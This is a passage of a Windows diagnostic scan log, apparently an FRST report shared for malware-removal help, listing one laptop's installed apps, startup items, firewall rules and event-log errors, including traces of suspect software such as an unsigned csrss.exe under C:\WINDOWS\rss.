Bubble Witch 3 Saga -> C:\Program Files\WindowsApps\king.com.BubbleWitch3Saga_6.5.8.0_x86__kgqvnymyfvs32 [2020-02-11] (king.com)
Candy Crush Soda Saga -> C:\Program Files\WindowsApps\king.com.CandyCrushSodaSaga_1.157.400.0_x86__kgqvnymyfvs32 [2020-02-11] (king.com)
Disney Magic Kingdoms -> C:\Program Files\WindowsApps\A278AB0D.DisneyMagicKingdoms_4.8.0.6_x86__h6adky7gbf63m [2020-02-11] (Gameloft.)
Dolby Access -> C:\Program Files\WindowsApps\DolbyLaboratories.DolbyAccess_3.1.4081.0_x64__rz1tebttyb220 [2020-01-30] (Dolby Laboratories)
Dropbox promotion -> C:\Program Files\WindowsApps\C27EB4BA.DropboxOEM_20.4.3.0_x64__xbfy0k16fey96 [2020-01-24] (Dropbox Inc.)
HP JumpStart -> C:\Program Files\WindowsApps\AD2F1837.HPJumpStart_1.4.443.0_x86__v10z8vjag6ke6 [2018-01-05] (HP Inc.)
Lightning Strikes -> C:\Program Files\WindowsApps\Microsoft.LightningStrikes_1.0.0.0_neutral__8wekyb3d8bbwe [2018-06-06] (Microsoft Corporation)
March of Empires: War of Lords -> C:\Program Files\WindowsApps\A278AB0D.MarchofEmpires_4.5.2.1_x86__h6adky7gbf63m [2020-01-24] (Gameloft.)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-13] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-13] (Microsoft Corporation) [MS Ad]
Microsoft News -> C:\Program Files\WindowsApps\Microsoft.BingNews_4.35.20273.0_x64__8wekyb3d8bbwe [2020-02-04] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.5.12061.0_x64__8wekyb3d8bbwe [2019-12-13] (Microsoft Studios) [MS Ad]
MSN Počasie -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.34.13393.0_x64__8wekyb3d8bbwe [2019-12-19] (Microsoft Corporation) [MS Ad]
PDF Reader - View, Edit, Share -> C:\Program Files\WindowsApps\0D9A1B2D.PDFReaderUWP_1.9.1225.0_x64__jhretta7p24aw [2019-12-27] (Kdan Mobile Software Ltd.) [MS Ad]
Power Media Player 14 for HP Consumer PCs with DVD -> C:\Program Files\WindowsApps\CyberLinkCorp.hs.PowerMediaPlayer14forHPConsumerPC_14.2.9528.0_x86__06qsbagp91rvg [2019-01-27] (CYBERLINKCOM CORP)
Rozšírenie pre video MPEG-2 -> C:\Program Files\WindowsApps\Microsoft.MPEG2VideoExtension_1.0.22661.0_x64__8wekyb3d8bbwe [2019-09-25] (Microsoft Corporation)
Simple Solitaire -> C:\Program Files\WindowsApps\26720RandomSaladGamesLLC.SimpleSolitaire_6.16.72.0_x64__kx24dqmazqk8j [2019-12-20] (Random Salad Games LLC) [MS Ad]
Spotify Music -> C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.125.559.0_x86__zpdnekdrzrea0 [2020-02-02] (Spotify AB) [Startup Task]
Stars at Night -> C:\Program Files\WindowsApps\Microsoft.StarsatNight_1.0.0.0_neutral__8wekyb3d8bbwe [2018-06-06] (Microsoft Corporation)
Torrent RT FREE Plus -> C:\Program Files\WindowsApps\48295AnnsSoft.TorrentRTFREEPlus_1.1.11.0_x64__nt3rsdpnc0zyt [2019-10-13] (Ann's Soft) [MS Ad]
Undersea Life -> C:\Program Files\WindowsApps\Microsoft.UnderseaLife_1.0.0.0_neutral__8wekyb3d8bbwe [2018-08-09] (Microsoft Corporation)
VLC -> C:\Program Files\WindowsApps\VideoLAN.VLC_3.2.1.0_x64__paz6r1rewnh0a [2019-06-06] (VideoLAN)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-02-04] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-02-04] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2018-04-02] (Advanced Micro Devices, Inc.) [File not signed]
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-02-04] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-02-04] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Drivers32-x32: [vidc.XVID] => xvidvfw.dll
HKLM\...\Drivers32-x32: [VIDC.VP80] => vp8vfw.dll

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

ShortcutWithArgument: C:\Users\OKAY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Warface\Warface.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --app=hxxp://go.playmmogames.com/aff_c?offer_id=4908&aff_id=1034&aff_sub=100 --app-window-size=1366,768
ShortcutWithArgument: C:\Users\OKAY\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Warface.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --app=hxxp://go.playmmogames.com/aff_c?offer_id=4908&aff_id=1034&aff_sub=100 --app-window-size=1366,768

==================== Loaded Modules (Whitelisted) =============

2019-12-14 00:38 - 2019-12-14 00:38 - 000138240 _____ ( ) [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Interop.IWs06dcaa36#\0b0a9a6c3e86b3507fcdda0f6eb137b6\Interop.IWshRuntimeLibrary.ni.dll
2019-05-15 18:39 - 2010-01-05 12:48 - 000028672 _____ () [File not signed] C:\Program Files (x86)\IR\KeyBoard.dll
2017-12-15 20:17 - 2017-12-15 20:17 - 000015360 _____ () [File not signed] C:\Program Files\AMD\CNext\CNext\libEGL.DLL
2017-12-15 20:17 - 2017-12-15 20:17 - 002519040 _____ () [File not signed] C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2018-04-02 00:45 - 2018-04-02 00:45 - 000017408 _____ () [File not signed] C:\Program Files\ATI Technologies\ATI.ACE\a4\AS4.NativeProxy.dll
2020-01-24 00:41 - 2020-01-24 00:41 - 000160768 _____ () [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\BRIDGECommon\9be6c3f5f469f4518c390f1110ef3cb5\BRIDGECommon.ni.dll
2020-01-24 00:43 - 2020-01-24 00:43 - 000125440 _____ () [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\BridgeExtension\76365bd0bca38f58b355619ce028df64\BridgeExtension.ni.dll
2020-01-24 00:43 - 2020-01-24 00:43 - 000395264 _____ () [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\CleanStartController\6748b68eea0a10a7a53a6ab9d8f8be6a\CleanStartController.ni.dll
2020-01-24 00:43 - 2020-01-24 00:43 - 000079872 _____ () [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\NativeInterop\e83bf3b6fb72f61a4d771e732b1251c8\NativeInterop.ni.dll
2020-01-24 00:43 - 2020-01-24 00:43 - 000145920 _____ () [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Registratio4eabc192#\1d543e2da5faac9667545bd82188eafb\RegistrationUtilities.ni.dll
2019-05-15 18:36 - 2008-09-05 14:04 - 000155648 _____ (arcsoft) [File not signed] C:\Program Files (x86)\ArcSoft\TotalMedia 3.5\uEpg.dll
2020-01-24 00:44 - 2020-01-24 00:44 - 000134656 _____ (hardcodet.net) [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Hardcodet.W6cab32f3#\7afb9fbaec84df798b337bf705efb6f5\Hardcodet.Wpf.TaskbarNotification.ni.dll
2020-01-24 00:43 - 2020-01-24 00:43 - 000136192 _____ (HP Inc.) [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\CommonPortable\710591b1b763f825543317df9c13e4bf\CommonPortable.ni.dll
2020-01-24 00:44 - 2020-01-24 00:44 - 001585152 _____ (Mark Heath) [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\NAudio\713ed8253fdf6fbadd13fd43ee1e638a\NAudio.ni.dll
2020-01-24 00:41 - 2020-01-24 00:41 - 002306560 _____ (Newtonsoft) [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Newtonsoft.Json\b9ed7bd858ef8d4779605e6e9c5b07c7\Newtonsoft.Json.ni.dll
2020-01-24 00:44 - 2020-01-24 00:44 - 000792064 _____ (The Apache Software Foundation) [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\log4net\803663175b71dece2dc0e3b4ebb387ec\log4net.ni.dll
2017-12-15 20:18 - 2017-12-15 20:18 - 000032768 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\imageformats\qgif.dll
2017-12-15 20:18 - 2017-12-15 20:18 - 000039936 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\imageformats\qicns.dll
2017-12-15 20:18 - 2017-12-15 20:18 - 000034816 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\imageformats\qico.dll
2017-12-15 20:18 - 2017-12-15 20:18 - 000237568 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\imageformats\qjpeg.dll
2017-12-15 20:18 - 2017-12-15 20:18 - 000025600 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\imageformats\qsvg.dll
2017-12-15 20:18 - 2017-12-15 20:18 - 000025600 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\imageformats\qtga.dll
2017-12-15 20:18 - 2017-12-15 20:18 - 000024064 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\imageformats\qwbmp.dll
2017-12-15 20:18 - 2017-12-15 20:18 - 000481792 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\imageformats\qwebp.dll
2017-12-15 20:18 - 2017-12-15 20:18 - 001336832 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\platforms\qwindows.dll
2018-04-02 00:43 - 2018-04-02 00:43 - 005766144 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Core.dll
2017-12-15 20:17 - 2017-12-15 20:17 - 006045696 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Gui.dll
2017-12-15 20:17 - 2017-12-15 20:17 - 001136128 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Charts.dll
2017-12-15 20:17 - 2017-12-15 20:17 - 001204736 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Network.dll
2017-12-15 20:17 - 2017-12-15 20:17 - 003234304 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Qml.dll
2017-12-15 20:17 - 2017-12-15 20:17 - 003406848 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Quick.dll
2017-12-15 20:17 - 2017-12-15 20:17 - 000328704 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Svg.dll
2017-12-15 20:17 - 2017-12-15 20:17 - 005523456 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Widgets.dll
2017-12-15 20:17 - 2017-12-15 20:17 - 000283136 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5WinExtras.dll
2017-12-15 20:17 - 2017-12-15 20:17 - 000194560 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\Qt5Xml.dll
2017-12-15 20:18 - 2017-12-15 20:18 - 000049152 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\QtGraphicalEffects\private\qtgraphicaleffectsprivate.dll
2017-12-15 20:18 - 2017-12-15 20:18 - 000018432 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\QtGraphicalEffects\qtgraphicaleffectsplugin.dll
2017-12-15 20:18 - 2017-12-15 20:18 - 000018432 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2017-12-15 20:18 - 2017-12-15 20:18 - 000311296 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2017-12-15 20:18 - 2017-12-15 20:18 - 000139264 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2017-12-15 20:18 - 2017-12-15 20:18 - 000089600 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2017-12-15 20:18 - 2017-12-15 20:18 - 000018432 _____ (The Qt Company Ltd) [File not signed] C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer trusted/restricted ==========

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com
IE trusted site: HKU\S-1-5-21-3379079519-2247991655-2019407835-1001\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-3379079519-2247991655-2019407835-1001\...\sharepoint.com -> hxxps://topkarmoto-files.sharepoint.com
IE trusted site: HKU\S-1-5-21-3379079519-2247991655-2019407835-1001\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2017-09-29 14:46 - 2019-08-16 18:34 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3379079519-2247991655-2019407835-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img2.jpg
DNS Servers: 192.168.1.1 - 195.146.128.62
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\StartupFolder: => "updateSteam.bat"
HKLM\...\StartupApproved\Run: => "boincmgr"
HKLM\...\StartupApproved\Run: => "boinctray"
HKLM\...\StartupApproved\Run32: => "HPMessageService"
HKLM\...\StartupApproved\Run32: => "HPRadioMgr"
HKU\S-1-5-21-3379079519-2247991655-2019407835-1001\...\StartupApproved\StartupFolder: => "Facebook Gameroom.lnk"
HKU\S-1-5-21-3379079519-2247991655-2019407835-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3379079519-2247991655-2019407835-1001\...\StartupApproved\Run: => "Chromium"
HKU\S-1-5-21-3379079519-2247991655-2019407835-1001\...\StartupApproved\Run: => "CloudNet"
HKU\S-1-5-21-3379079519-2247991655-2019407835-1001\...\StartupApproved\Run: => "uTorrent"
HKU\S-1-5-21-3379079519-2247991655-2019407835-1001\...\StartupApproved\Run: => "Opera Browser Assistant"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{15D351AE-59A7-4C5F-9D5F-C91AD77060A7}] => (Allow) C:\Program Files (x86)\ArcSoft\TotalMedia 3.5\TotalMedia.exe (ArcSoft, Inc.) [File not signed]
FirewallRules: [{35A8092E-0C16-48F3-AA27-B6BF0D39C983}] => (Allow) C:\Program Files (x86)\ArcSoft\TotalMedia 3.5\TotalMedia.exe (ArcSoft, Inc.) [File not signed]
FirewallRules: [{7EA35566-E1FD-420E-842F-AD4A0A9A837D}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{20E626BC-644A-45A2-9100-61DE32DC8837}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{F88CB241-0028-4245-9A30-6B8FCEA742AA}] => (Block) %ProgramFiles% (x86)\Steam\Steam.exe No File
FirewallRules: [{54393F6B-9487-4E06-9E69-153160FDDF8C}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe No File
FirewallRules: [{EB13062D-49AF-4B5F-B2AA-28B6F0DC0104}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe No File
FirewallRules: [{4373B1C1-FFE5-449B-944F-7A3A76C21662}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe No File
FirewallRules: [{0493B30F-9CB3-4DCB-ABCA-D7EA522DE69A}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe No File
FirewallRules: [{7C952527-A72F-497F-8D3D-2435B5DACAA0}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{5A50749A-E847-4C14-86E6-5E5D49262595}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{D3028DF4-79C7-4F8E-A080-7298AA8A96E4}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{D4967EDF-7875-4E58-A7DD-0D43B05D824E}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{E6041327-048D-47AB-A410-BBE04A569912}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{4FB36CDE-DE6B-4036-B6B4-AE4C4446B455}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{DBB74A32-6712-4046-8D0F-64A66AE74582}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{C287F68D-ED97-4FB8-A0E5-BD80DF3AF7D4}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{A59D69C6-7605-4854-803E-76C50DABB534}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{DE41BE5D-078F-4A0B-AF9A-69825F6F1C77}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{B384DD07-BE98-4A6B-9F83-DFC050623CCE}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.124.91.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{FAFB5B62-11DE-42B9-94A1-01903E69EDCC}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.124.91.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{2FEBF535-F0C2-459D-A1A0-B00F7FF5A4DB}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.124.91.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{F8A5A5CF-86A7-4C74-BF37-298509E3C3F6}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.124.91.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{58A7BFF5-3721-46E8-8F0C-E6742A24D936}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.124.91.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{9CB3E274-628B-4E60-8471-490FA80EC102}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.124.91.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{D47ACB8F-0203-4F26-B84A-99CF59F82E71}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.124.91.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{5DC2A124-1330-4E82-B79D-AF951460CA44}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.124.91.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{D0AD9442-8BB8-4F5F-B4D9-0CB2AF803528}] => (Allow) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.44\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{6A707B30-41A9-458A-9155-6DE07FBDA27C}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.125.559.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{1DB84AED-76B6-4FFC-90BD-60FF741BC3D2}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.125.559.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{090A69EE-B472-4D91-95E4-36885C33AFCE}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.125.559.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{D11B067B-DA74-48E6-AD9C-C246DE1B16F3}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.125.559.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{3C5FC3CD-8976-4CF3-B899-BDA3CD3B1A1A}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.125.559.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{E2B6E845-ABFC-40D8-9D1D-4FFF79934F7C}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.125.559.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{DCE0FA71-A318-4DF9-9A28-6115904CB67F}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.125.559.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{E2E8BC23-B8A8-471A-AB96-07354B8067F0}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.125.559.0_x86__zpdnekdrzrea0\Spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{D15C6F22-3DDD-41E2-8618-1348179C824E}] => (Allow) C:\Users\OKAY\AppData\Local\Programs\Opera\66.0.3515.72\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{2CE0B90A-99C7-4786-AF9A-BD7C513DA191}] => (Allow) C:\Users\OKAY\AppData\Roaming\uTorrent\uTorrent.exe No File
FirewallRules: [{4D4782A3-25EA-4028-B5BE-4F204B7157CC}] => (Allow) C:\Users\OKAY\AppData\Roaming\uTorrent\uTorrent.exe No File
FirewallRules: [{80D303BA-DFF9-4043-914E-E3F482D08A03}] => (Allow) C:\Users\OKAY\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
FirewallRules: [{8708BC7E-8036-49A3-8528-782A6BA3D477}] => (Allow) C:\WINDOWS\rss\csrss.exe () [File not signed]

==================== Restore Points =========================

29-01-2020 23:53:39 Windows Update
11-02-2020 10:33:39 Scheduled Checkpoint

==================== Faulty Device Manager Devices ============

==================== Event log errors: ========================

Application errors:
==================
Error: (02/25/2020 10:13:27 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (3876,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) occurred while opening logfile C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.

Error: (02/25/2020 09:49:13 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (5968,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) occurred while opening logfile C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.

Error: (02/25/2020 09:42:21 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program PilotshubApp.exe version 1.1907.1911.11002 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.

Process ID: 1e90

Start Time: 01d5ec1a674d7bca

Termination Time: 4294967295

Application Path: C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\PilotshubApp.exe

Report Id: c56eb847-102e-44aa-92ae-fa4a0f586490

Faulting package full name: Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe

Faulting package-relative application ID: App

Hang type: Quiesce

Error: (02/25/2020 09:41:03 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1020) (User: NT AUTHORITY)
Description: The required buffer size is greater than the buffer size passed to the Collect function of the "C:\Windows\System32\perfts.dll" Extensible Counter DLL for the "LSM" service. The given buffer size was 17576 and the required size was 31384.

Error: (02/25/2020 05:18:29 PM) (Source: Microsoft-Windows-RestartManager) (EventID: 10006) (User: LAPTOP-FDEQH5KS)
Description: Application or service 'Microsoft Windows Search Protocol Host' could not be shut down.

Error: (02/25/2020 05:14:28 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (7216,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) occurred while opening logfile C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.

Error: (02/25/2020 05:04:54 PM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (02/25/2020 05:02:18 PM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (804,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) occurred while opening logfile C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.

System errors:
=============
Error: (02/25/2020 06:57:48 PM) (Source: DCOM) (EventID: 10010) (User: LAPTOP-FDEQH5KS)
Description: The server Microsoft.WindowsStore_12001.1001.5.0_x64__8wekyb3d8bbwe!App.AppX8h0bdkbb5frkt9s09fvshhbvqnntmvm1.mca did not register with DCOM within the required timeout.

Error: (02/24/2020 01:38:20 PM) (Source: DCOM) (EventID: 10010) (User: LAPTOP-FDEQH5KS)
Description: The server Microsoft.OneConnect_5.1911.3171.0_x64__8wekyb3d8bbwe!App.AppXe8pdgw5syxe8pgccbk3mcn5hanwamr0e.mca did not register with DCOM within the required timeout.

Error: (02/24/2020 01:38:20 PM) (Source: DCOM) (EventID: 10010) (User: LAPTOP-FDEQH5KS)
Description: The server Microsoft.MicrosoftOfficeHub_18.2001.1241.0_x64__8wekyb3d8bbwe!Microsoft.MicrosoftOfficeHub.AppXt4mh7c9swwc5cmd5jgmtmwcfmvkddpn1.mca did not register with DCOM within the required timeout.

Error: (02/24/2020 10:59:33 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Služba Software Protection sa neočakávane ukončila. Služba sa týmto spôsobom ukončila už 1 krát. O 120000 ms bude vykonaná nasledujúca opravná akcia: Reštartovať službu.

Error: (02/16/2020 05:35:44 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Počas čakania na odpoveď transakcie od služby ClickToRunSvc bol dosiahnutý časový limit (30000 ms).

Error: (02/16/2020 04:24:58 PM) (Source: DCOM) (EventID: 10010) (User: LAPTOP-FDEQH5KS)
Description: The server {2593F8B9-4EAF-457C-B68A-50F6B8EA6B54} did not register with DCOM within the required timeout.

Error: (02/16/2020 04:24:53 PM) (Source: DCOM) (EventID: 10010) (User: LAPTOP-FDEQH5KS)
Description: The server Microsoft.Windows.Cortana_1.13.0.18362_neutral_neutral_cw5n1h2txyewy!CortanaUI did not register with DCOM within the required timeout.

Error: (02/16/2020 04:24:51 PM) (Source: DCOM) (EventID: 10010) (User: LAPTOP-FDEQH5KS)
